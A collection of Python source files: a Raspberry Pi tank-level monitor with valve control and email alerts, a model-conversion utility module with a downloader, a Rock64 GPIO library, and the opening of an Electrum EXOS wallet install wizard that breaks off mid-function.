records = logger.deltas if deltas else logger.records
if fmt == 'nvd3':
self.finish({'key': 'Tank Level',
'values': list(records)})
elif fmt == 'tsv':
self.set_header('Content-Type', 'text/plain')
if deltas:
self.write('"Timestamp"\t"Rate of Change (%s/min)"\n' % appconfig.LOG_UNIT)
else:
self.write('"Timestamp"\t"%s"\n' % appconfig.LOG_UNIT)
self.write_tsv(records)
self.finish()
def write_tsv(self, records):
for record in records:
timestamp = datetime.fromtimestamp(record.timestamp).strftime('%Y-%m-%d %H:%M:%S')
self.write(str(timestamp))
self.write('\t')
self.write(str(record.depth))
self.write('\n')
class ValveHandler(RequestHandler):
"""Callers can use the GET method to get the status of the creek intake valve and use the
POST method to toggle the status of the creek intake valve.
In both cases the response is a json dict like so:
{
"valve": 0,
"transition_time": "2015-03-18T12:00:12"
}
Indicating the current status of the valve: 0 means that the IO pin is low (the valve is
normally-open, so the valve will be open). 1 means that the IO pin is high and the valve is
closed. transition_time is the time of the most recent state change, in the server's time
zone, or null if the transition time is not known."""
_valve_state = False
_transition_time = None
def get(self, *args, **kwargs):
self.finish(ValveHandler.get_state())
def post(self, *args, **kwargs):
auth_header = self.request.headers.get('Authorization')
if auth_header is None or not auth_header.startswith('Basic '):
self.set_status(401, reason="Valve control requires authentication")
self.set_header('WWW-Authenticate', 'Basic realm=Restricted')
self.finish()
return
else:
auth_decoded = base64.decodestring(auth_header[6:])
hdr_auth = dict()
hdr_auth['username'], hdr_auth['password'] = auth_decoded.split(':', 2)
if hdr_auth != appconfig.CREDENTIALS:
raise HTTPError(403, reason="Valve control credentials invalid")
ValveHandler._valve_state = not ValveHandler._valve_state
ValveHandler._transition_time = datetime.now().isoformat()[:19]
wiringpi.digitalWrite(VALVE_GPIO, int(ValveHandler._valve_state))
self.finish(ValveHandler.get_state())
@staticmethod
def get_state():
return {
'valve': ValveHandler._valve_state,
'transition_time': ValveHandler._transition_time
}
class TankMonitor(Application):
def __init__(self, handlers=None, **settings):
super(TankMonitor, self).__init__(handlers, **settings)
rate_threshold = appconfig.ALERT_RATE_THRESHOLD
self.level_threshold = appconfig.ALERT_LEVEL_THRESHOLD
self.tensec_logger = TankLogger(10, alert_rate_threshold=rate_threshold)
self.minute_logger = TankLogger(60, alert_rate_threshold=rate_threshold)
self.hour_logger = TankLogger(3600, alert_rate_threshold=rate_threshold)
self.latest_raw_val = None
self.display_expiry = 0
def log_tank_depth(self, tank_depth):
"""This method can be called from outside the app's IOLoop. It's the
only method that can be called like that"""
log.debug("Logging depth: " + str(tank_depth))
IOLoop.current().add_callback(partial(self._offer_log_record, time(),
tank_depth))
@coroutine
def _offer_log_record(self, timestamp, depth):
log_record = TankLogRecord(timestamp=timestamp, depth=depth)
if depth < self.level_threshold:
yield AlertMailer.offer(TankAlert(timestamp=timestamp, depth=depth, delta=None))
for logger in self.tensec_logger, self.minute_logger, self.hour_logger:
alert = logger.offer(log_record)
if alert:
yield AlertMailer.offer(alert)
EventConnection.notify_all({
'event': 'log_value',
'timestamp': timestamp,
'value': depth
})
def update_display(self):
ip_addr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
now = time()
if now < self.display_expiry:
im = Image.new('1', (84, 48))
draw = ImageDraw.Draw(im)
draw.text((0, 5), self.latest_raw_val, font=disp_font, fill=1)
draw.text((0, 0), ip_addr, font=disp_font_sm, fill=1)
draw.text((5, 36), "mm to surface", font=disp_font_sm, fill=1)
lcd.show_image(im)
# clean up
del draw
del im
lcd.set_contrast(disp_contrast_on)
else:
lcd.set_contrast(disp_contrast_off)
lcd.cls()
def poll_display_button(self):
btn_down = wiringpi.digitalRead(BTN_IN)
if btn_down:
self.display_expiry = time() + 60
def _set_latest_raw_val(self, val):
self.latest_raw_val = val
def set_latest_raw_val(self, val):
"""This method can be called from any thread."""
IOLoop.instance().add_callback(self._set_latest_raw_val, val)
class MaxbotixHandler():
def __init__(self, tank_monitor, **kwargs):
"""kwargs will be passed through to the serial port constructor"""
self.port_lock = Lock()
self.serial_port = None
self.set_serial_port(**kwargs)
self.stop_reading = False
self.tank_monitor = tank_monitor
self.calibrate_m = 1
self.calibrate_b = 0
def read(self):
log.info("Starting MaxbotixHandler read")
val = None
while not self.stop_reading:
try:
with self.port_lock:
val = self.serial_port.read()
if val == 'R':
val = self.serial_port.read(4)
self.tank_monitor.set_latest_raw_val(val)
self.tank_monitor.log_tank_depth(self.convert(val))
except:
print "Unable to convert value '" + str(val) + "'"
import traceback
traceback.print_exc()
def calibrate(self, m, b):
""" Defines the parameters for a linear equation y=mx+b, which is used
to convert the output of the sensor to whatever units are specified in the settings file.
"""
log.info("Calibrating Maxbotix interface with m=%2.4f, b=%2.4f" % (m, b))
self.calibrate_m = float(m)
self.calibrate_b = float(b)
def convert(self, val):
converted = self.calibrate_m * float(val) + self.calibrate_b
if log.isEnabledFor(logging.DEBUG):
log.debug("Raw value %2.4f converted to %2.4f" % (float(val), converted))
return converted
def shutdown(self):
self.stop_reading = True
def set_serial_port(self, **kwargs):
with self.port_lock:
self.serial_port = Serial(**kwargs)
class AlertMailer(object):
last_alert = None
alert_mail = Template(open('templates/tanklevel.txt', 'rb').read())
@staticmethod
def send_message(alert_text, tank_alert):
msg = MIMEText(alert_text)
msg[
'Subject'] = "[TWUC Alert] Tank Level Warning" if not tank_alert.delta else "[TWUC Alert] Tank Delta Warning"
msg['From'] = appconfig.EMAIL['sending_address']
msg['To'] = ', '.join(appconfig.EMAIL['distribution'])
conn = None
try:
conn = smtplib.SMTP(
"%s:%d" % (appconfig.EMAIL['smtp_server'], appconfig.EMAIL['smtp_port']))
if appconfig.EMAIL['smtp_tls']:
conn.starttls()
conn.login(appconfig.EMAIL['sending_address'], appconfig.EMAIL['sending_password'])
conn.sendmail(appconfig.EMAIL['sending_address'], appconfig.EMAIL['distribution'],
msg.as_string())
finally:
if conn:
conn.quit()
@staticmethod
@coroutine
def offer(tank_alert):
offer_time = time()
if AlertMailer.last_alert is None or \
(offer_time - AlertMailer.last_alert) > appconfig.EMAIL['period']:
alert_text = AlertMailer.alert_mail.generate(alert=tank_alert)
log.warn("Sending e-mail alert due to " + str(tank_alert))
log.warn(alert_text)
AlertMailer.last_alert = offer_time
yield thread_pool.submit(lambda: AlertMailer.send_message(alert_text, tank_alert))
if __name__ == "__main__":
event_router = SockJSRouter(EventConnection, '/event')
handlers = [
(r'/', MainPageHandler),
(r'/logger/(.*)', LogDownloadHandler), # arg is log interval
(r'/valve', ValveHandler)
]
handlers += event_router.urls
tornado_settings = {
'static_path': 'static',
'template_path': 'templates',
'debug': True
}
lcd.init()
lcd.gotoxy(0, 0)
lcd.set_contrast(disp_contrast_on)
lcd.cls()
lcd.text("LCD Init")
wiringpi.pinMode(BTN_OUT, 1)
wiringpi.digitalWrite(BTN_OUT, 1)
wiringpi.pinMode(VALVE_GPIO, 1)
wiringpi.digitalWrite(VALVE_GPIO, 0)
wiringpi.pinMode(BTN_IN, 0)
app = TankMonitor(handlers, **tornado_settings)
maxbotix = MaxbotixHandler(tank_monitor=app, port='/dev/ttyAMA0', timeout=10)
maxbotix.calibrate(appconfig.MAXBOTICS['calibrate_m'],
appconfig.MAXBOTICS['calibrate_b'])
ioloop = IOLoop.instance()
disp_print_cb = PeriodicCallback(app.update_display, callback_time=500, io_loop=ioloop)
disp_print_cb.start()
button_poll_cb = PeriodicCallback(app.poll_display_button, callback_time=100, io_loop=ioloop)
button_poll_cb.start()
http_server = HTTPServer(app)
http_server.listen(listen_port)
log.info("Listening on port " + str(listen_port))
maxbotix_thread = Thread(target=maxbotix.read)
maxbotix_thread.daemon = True
maxbotix_thread.start()
ioloop.start()
|
utils.py
|
#----------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#----------------------------------------------------------------------------------------------
from __future__ import division
import os
import sys
import numpy as np
from six import text_type, binary_type, integer_types
import ox.common.IR.graph_pb2 as graph_pb2
__all__ = ["assign_IRnode_values", "convert_onnx_pad_to_tf", 'convert_tf_pad_to_onnx',
'compute_tf_same_padding', 'is_valid_padding', 'download_file',
'shape_to_list', 'list_to_shape']
def assign_attr_value(attr, val):
from ox.common.IR.graph_pb2 import TensorShape
'''Assign value to AttrValue proto according to data type.'''
if isinstance(val, bool):
attr.b = val
elif isinstance(val, integer_types):
attr.i = val
elif isinstance(val, float):
attr.f = val
elif isinstance(val, binary_type) or isinstance(val, text_type):
if hasattr(val, 'encode'):
val = val.encode()
attr.s = val
elif isinstance(val, TensorShape):
attr.shape.MergeFromString(val.SerializeToString())
elif isinstance(val, list):
if not val: return
if isinstance(val[0], integer_types):
attr.list.i.extend(val)
elif isinstance(val[0], TensorShape):
attr.list.shape.extend(val)
elif isinstance(val[0], float):
attr.list.f.extend(val)
else:
raise NotImplementedError('AttrValue cannot be of list[{}].'.format(val[0]))
elif isinstance(val, np.ndarray):
assign_attr_value(attr, val.tolist())
else:
pass
# raise NotImplementedError('AttrValue cannot be of %s' % type(val))
def assign_IRnode_values(IR_node, val_dict):
for name, val in val_dict.items():
assign_attr_value(IR_node.attr[name], val)
# For padding
def convert_tf_pad_to_onnx(pads):
pads = np.reshape(pads, -1).tolist()
dims = len(pads)
assert dims % 2 == 0
ret = []
for idx in range(0, dims, 2):
ret.append(pads[idx])
for idx in range(1, dims, 2):
ret.append(pads[idx])
return ret
def convert_onnx_pad_to_tf(pads):
return np.transpose(np.array(pads).reshape([2, -1])).reshape(-1, 2).tolist()
def is_valid_padding(pads):
return sum(np.reshape(pads, -1)) == 0
def shape_to_list(shape):
return [dim.size for dim in shape.dim]
def list_to_shape(shape):
ret = graph_pb2.TensorShape()
for dim in shape:
new_dim = ret.dim.add()
new_dim.size = dim
return ret
def compute_tf_same_padding(input_shape, kernel_shape, strides, data_format='NHWC'):
""" Convert [SAME] padding in tensorflow, keras to onnx pads,
i.e. [x1_begin, x2_begin...x1_end, x2_end,...] """
# print (input_shape)
# print (kernel_shape)
# print (strides)
if data_format.startswith('NC'):
# Not tested
input_shape = input_shape[2:]
remove_dim = len(strides) - len(input_shape)
if remove_dim > 0:
strides = strides[remove_dim::]
else:
input_shape = input_shape[1:-1]
remove_dim = len(input_shape) - len(strides) + 1
if remove_dim < 0:
strides = strides[1:remove_dim]
# print (input_shape)
# print (kernel_shape)
# print (strides)
up_list = [0]
down_list = [0]
for idx in range(0, len(input_shape)):
# kernel_shape[idx] = (kernel_shape[idx] - 1) * dilation_rate + 1
output_shape = (input_shape[idx] + strides[idx] - 1) // strides[idx]
this_padding = (output_shape - 1) * strides[idx] + kernel_shape[idx] - input_shape[idx]
this_padding = max(0, this_padding)
up_list.append(this_padding // 2)
down_list.append(this_padding - this_padding // 2)
# print ([0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0])
# print ('-----------------------------------------------------')
return [0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0]
# network library
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def _progress_check(count, block_size, total_size):
read_size = count * block_size
read_size_str = sizeof_fmt(read_size)
if total_size > 0:
percent = int(count * block_size * 100 / total_size)
percent = min(percent, 100)
sys.stdout.write("\rprogress: {} downloaded, {}%.".format(read_size_str, percent))
if read_size >= total_size:
sys.stdout.write("\n")
else:
sys.stdout.write("\rprogress: {} downloaded.".format(read_size_str))
sys.stdout.flush()
def _single_thread_download(url, file_name):
from six.moves import urllib
result, _ = urllib.request.urlretrieve(url, file_name, _progress_check)
return result
def _downloader(start, end, url, filename):
import requests
headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
var = fp.tell()
fp.write(r.content)
def _multi_thread_download(url, file_name, file_size, thread_count):
import threading
fp = open(file_name, "wb")
fp.truncate(file_size)
fp.close()
part = file_size // thread_count
for i in range(thread_count):
start = part * i
if i == thread_count - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=_downloader, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})
t.setDaemon(True)
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
return file_name
def download_file(url, directory='./', local_fname=None, force_write=False, auto_unzip=False, compre_type=''):
"""Download the data from source url, unless it's already here.
Args:
filename: string, name of the file in the directory.
work_directory: string, path to working directory.
source_url: url to download from if file doesn't exist.
Returns:
Path to resulting file.
"""
if not os.path.isdir(directory):
os.mkdir(directory)
if not local_fname:
k = url.rfind('/')
local_fname = url[k + 1:]
local_fname = os.path.join(directory, local_fname)
if os.path.exists(local_fname) and not force_write:
print ("File [{}] existed!".format(local_fname))
return local_fname
else:
print ("Downloading file [{}] from [{}]".format(local_fname, url))
try:
import wget
ret = wget.download(url, local_fname)
print ("")
except:
ret = _single_thread_download(url, local_fname)
if auto_unzip:
if ret.endswith(".tar.gz") or ret.endswith(".tgz"):
try:
import tarfile
tar = tarfile.open(ret)
for name in tar.getnames():
if not (os.path.realpath(os.path.join(directory, name))+ os.sep).startswith(os.path.realpath(directory) + os.sep):
raise ValueError('The decompression path does not match the current path. For more info: https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall')
tar.extractall(directory)
tar.close()
except ValueError:
raise
except:
print("Unzip file [{}] failed.".format(ret))
elif ret.endswith('.zip'):
try:
import zipfile
zip_ref = zipfile.ZipFile(ret, 'r')
for name in zip_ref.namelist():
if not (os.path.realpath(os.path.join(directory, name))+ os.sep).startswith(os.path.realpath(directory) + os.sep):
raise ValueError('The decompression path does not match the current path. For more info: https://docs.python.org/3/library/zipfile.html?highlight=zipfile#zipfile.ZipFile.extractall')
zip_ref.extractall(directory)
zip_ref.close()
except ValueError:
raise
except:
print("Unzip file [{}] failed.".format(ret))
return ret
"""
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
return _multi_thread_download(url, local_fname, file_size, 5)
except:
# not support multi-threads download
return _single_thread_download(url, local_fname)
return result
"""
|
GPIOBase.py
|
from abc import ABC, abstractmethod
from enum import Enum
from ROCK.Rock64Configs import BaseConfig
import sys
import os
import select
from threading import Thread
import time
ROCK64 = 'ROCK64'
BOARD = 'BOARD'
BCM = 'BCM'
IN = "in"
OUT = "out"
NONE = "none"
RISING = "rising"
FALLING = "falling"
BOTH = "both"
HIGH, LOW = BaseConfig.factory('ROCK64').get_highlow()
PUD_UP, PUD_DOWN = BaseConfig.factory('ROCK64').get_pullupdown()
class GPIOBase(ABC):
warning_enabled = False
mode = None
@abstractmethod
def setmode(self, mode):
pass
def getmode(self):
return self.mode
def setwarnings(self, state=True):
self.warning_enabled = state
pass
@abstractmethod
def setup(self, channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
pass
@abstractmethod
def input(self, channel):
pass
@abstractmethod
def output(self, channel, value):
pass
@abstractmethod
def add_event_detect(self, channel, edge, callback, bouncetime):
pass
@abstractmethod
def remove_event_detect(self, channel):
pass
@staticmethod
def GPIOFactory(target):
if target == 'ROCK64':
return GPIORock64()
else:
raise ValueError("Not supported : {}".format(target))
class ThreadContext(object):
closethread = False
bouncetime = None
cb = None
threadhandle = None
def __init__(self, cb, bouncetime):
self.cb = cb
self.bouncetime = bouncetime
self.closethread = False
def notify_close(self):
self.closethread = True
if self.threadhandle is not None:
self.threadhandle.join()
class GPIORock64(GPIOBase):
gpio_offset = 0
event_cbs = {}
valid_channels = [27, 32, 33, 34, 35, 36, 37, 38, 64, 65, 67, 68, 69, 76, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 100, 101, 102, 103, 104]
# http://files.pine64.org/doc/rock64/ROCK64_Pi-2%20_and_Pi_P5+_Bus.pdf
native_to_rock64_map = [None, None, "GPIO2_D1", None, "GPIO2_D0", None, None, "GPIO2_A0", None, "GPIO2_A1",
None, "GPIO2_A3", None, None, "GPIO3_A4", "GPIO3_A5", None, "GPIO3_A6", "GPIO3_A1", None,
"GPIO3_A2", "GPIO3_A7", "GPIO3_A0", "GPIO3_B0", None, "GPIO2_B4", "GPIO2_A4", "GPIO2_A5", None, None,
None, "GPIO1_A6", "GPIO1_A0", None, "GPIO1_A1", "GPIO1_A5", "GPIO1_A2", "GPIO1_A4", None, "GPIO1_A3"]
def __init__(self, gpio_offset=0):
super().__init__()
self.gpio_offset = gpio_offset
pass
def channel_to_pin(self, pin):
"""Converts the given channel to physical pin to be exported via gpio sysfs"""
if self.mode == BOARD:
return self.board_to_pin(pin)
elif self.mode == ROCK64:
return self.rock64_to_pin(pin)
raise ValueError("invalid pin and/or mode")
def board_to_pin(self, boardpin):
"""Converts the given channel (assuming board numbering is being used) to physical pin"""
if not isinstance(boardpin, int):
raise ValueError("invalid board pin, expected int")
if boardpin < 0 or boardpin >= len(self.native_to_rock64_map):
raise ValueError("invalid board pin given, should be within the rage of 0 to {}".format(len(self.native_to_rock64_map) - 1))
if self.native_to_rock64_map[boardpin] is None:
raise ValueError("invalid board pin, no possible mapping with GPIO pins")
return self.native_to_rock64_map[boardpin]
def rock64_to_pin(self, rock64pin):
"""Converts the given channel (assuming rock64 gpio numbering is being used) to physical pin"""
if len(rock64pin) != 8:
print("length of input {} = {}".format(rock64pin, len(rock64pin)))
raise ValueError("invalid rock64 pin format, should be of GPIO<N>_<C><N> format "
"where N is number and C is character")
if rock64pin[:4] != "GPIO":
raise ValueError("invalid rock64 pin format, should be of GPIO{1-4}_{A-D}{1-9} format")
bankNumber = int(rock64pin[4:5])
padNumber = rock64pin[-2]
pinNumber = int(rock64pin[-1])
if padNumber not in ["A", "B", "C", "D"]:
raise ValueError("invalid rock64 pin format, should be of GPIO{1-4}_{A-D}{1-9} format")
padNumber = ["A", "B", "C", "D"].index(padNumber)
channel = self.gpio_offset + (bankNumber * 32) + (8 * padNumber) + pinNumber
if channel not in self.valid_channels:
raise ValueError("invalid rock64 pin : {} translates to {}, but not valid for rock64".format(rock64pin, channel))
return channel
def setmode(self, mode):
"""Sets the mode for GPIO"""
if mode == BCM:
raise NotImplementedError("BCM PINMODE not implemented")
if mode != ROCK64 and mode != BOARD:
raise RuntimeError("mode not supported : {}".format(mode))
self.mode = mode
pass
def log_warning(self, msg):
"""Logs the message based on warning settings"""
if self.warning_enabled:
print("[WARN] {}".format(msg))
def export(self, channel):
base_syspath = "/sys/class/gpio"
base_export_path = "{}/export".format(base_syspath)
exported = "{}/gpio{}".format(base_syspath, channel)
if os.path.exists(exported): # already exported
self.log_warning("{} already exported as {}".format(channel, exported))
return True
with open(base_export_path, "w") as f:
f.write(str(channel))
if os.path.exists(exported): # export successful
return True
return False
def get_direction(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_direction = "{}/gpio{}/direction".format(base_syspath, channel)
if not os.path.exists(base_gpio_direction):
raise ValueError("pin is not exported")
with open(base_gpio_direction, "r") as f:
return f.readline().splitlines()[0] # unsafe, but this is sysfs and the output is fixed
def set_direction(self, channel, direction):
base_syspath = "/sys/class/gpio"
base_gpio_direction = "{}/gpio{}/direction".format(base_syspath, channel)
if not os.path.exists(base_gpio_direction):
raise ValueError("channel not exported")
with open(base_gpio_direction, "w") as f:
f.write(direction)
if direction in self.get_direction(channel):
return True
return False
def get_value(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_value = "{}/gpio{}/value".format(base_syspath, channel)
if not os.path.exists(base_gpio_value):
raise ValueError("pin is not exported")
with open(base_gpio_value) as f:
return int(f.readline())
def set_value(self, channel, value):
base_syspath = "/sys/class/gpio"
base_gpio_value = "{}/gpio{}/value".format(base_syspath, channel)
if self.get_direction(channel) != OUT:
return False
with open(base_gpio_value, "w") as f:
f.write(value)
return True
def get_edge(self, channel):
base_syspath = "/sys/class/gpio"
base_gpio_edge = "{}/gpio{}/edge".format(base_syspath, channel)
if not os.path.exists(base_gpio_edge):
raise ValueError("pin is not exported")
with open(base_gpio_edge) as f:
return f.readline().splitlines()[0]
def set_edge(self, channel, edge):
base_syspath = "/sys/class/gpio"
base_gpio_edge = "{}/gpio{}/edge".format(base_syspath, channel)
if not os.path.exists(base_gpio_edge):
raise ValueError("pin is not exported")
if edge not in [RISING, FALLING, BOTH, NONE]:
raise ValueError("wrong edge type given")
with open(base_gpio_edge, 'w') as f:
f.write(edge)
return True
def validate_channel(self, channel):
if isinstance(channel, list):
for c in channel:
self.validate_channel(c)
return channel
elif isinstance(channel, int):
if self.mode != BOARD:
raise ValueError("invalid channel given, mode is not BOARD, but channel is integer")
return [channel]
elif isinstance(channel, str):
if self.mode != ROCK64:
raise ValueError("invalid channel given, mode is not ROCK64, but channel is string")
return [channel]
raise ValueError("invalid channel given")
def setup(self, channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
channel = self.validate_channel(channel)
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
if not self.export(chn_no):
raise ValueError("unable to export {}".format(cur_chn))
if not self.set_direction(chn_no, direction):
raise ValueError("unable to set direction {}".format(cur_chn))
# for now pull_up down is ignored, as I have to double check the datasheet to see if
# there is any such mode, if you know, please feel free to add them
if direction == OUT:
if not self.set_value(chn_no, initial):
raise ValueError("unable to set value {}".format(cur_chn))
pass
def fn_event_detect(self, channel, ctx):
if channel not in self.event_cbs.keys():
self.log_warning("unable to get context for the add_event_function, aborting")
epoll = select.epoll()
initial = self.get_value(channel)
initial_epoc = int(round(time.time() * 1000))
file = open("/sys/class/gpio/gpio{}/value".format(channel), 'r')
file.readline() # clear pending interrupts at the driver level
file.seek(0) # reset read cursor
epoll.register(file.fileno(), select.EPOLLPRI | select.EPOLLERR)
ctx.pollhandle = epoll
while not ctx.closethread:
events = epoll.poll(5) # poll every 5 seconds
for fileno, event in events:
if event & select.EPOLLPRI:
value = self.get_value(channel)
#print('OLD : {} NEW : {}'.format(initial, value))
cur_epoc = int(round(time.time() * 1000))
if cur_epoc - initial_epoc >= ctx.bouncetime and initial != value:
initial_epoc = cur_epoc
ctx.cb(channel, value)
file.readline() # clear pending interrupts at the driver level
file.seek(0) # reset read cursor
print("unregistering add_event_detect for {}".format(channel))
def add_event_detect(self, channel, edge, callback, bouncetime):
if callback is None:
self.log_warning("no callback given, ignoring add_event_detect() request")
return
if channel in self.event_cbs.keys():
self.log_warning("a previous event was defined for the key, replacing it")
ctx = self.event_cbs[channel]
ctx.notify_close()
del self.event_cbs[channel]
channel = self.validate_channel(channel)
if edge not in [RISING, FALLING, BOTH]:
raise ValueError("invalid edge value given for event detect. Only RISING, FALLING or BOTH allowed")
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
self.set_edge(chn_no, edge)
if self.get_edge(chn_no) != edge:
raise ValueError("unable to set edge for event detect")
ctx = ThreadContext(cb=callback, bouncetime=bouncetime)
ctx.threadhandle = Thread(target=self.fn_event_detect, args=(chn_no, ctx))
self.event_cbs[chn_no] = ctx
ctx.threadhandle.start()
pass
def remove_event_detect(self, channel):
channel = self.validate_channel(channel)
for cur_chn in channel:
chn_no = self.channel_to_pin(cur_chn)
if chn_no not in self.event_cbs:
raise ValueError("invalid channel {} given, no event was registered".format(cur_chn))
ctx = self.event_cbs[chn_no]
ctx.notify_close()
del self.event_cbs[chn_no]
def input(self, channel):
self.validate_channel(channel)
phypin = self.channel_to_pin(channel)
return self.get_value(phypin)
def output(self, channel, value):
self.validate_channel(channel)
phypin = self.channel_to_pin(channel)
return self.set_value(phypin, value)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_exos.wallet import Wallet, Abstract_Wallet
from electrum_exos.storage import WalletStorage
from electrum_exos.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_exos.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_exos.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_exos.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in EXOS Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('EXOS Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(615, 435)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('exos-electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
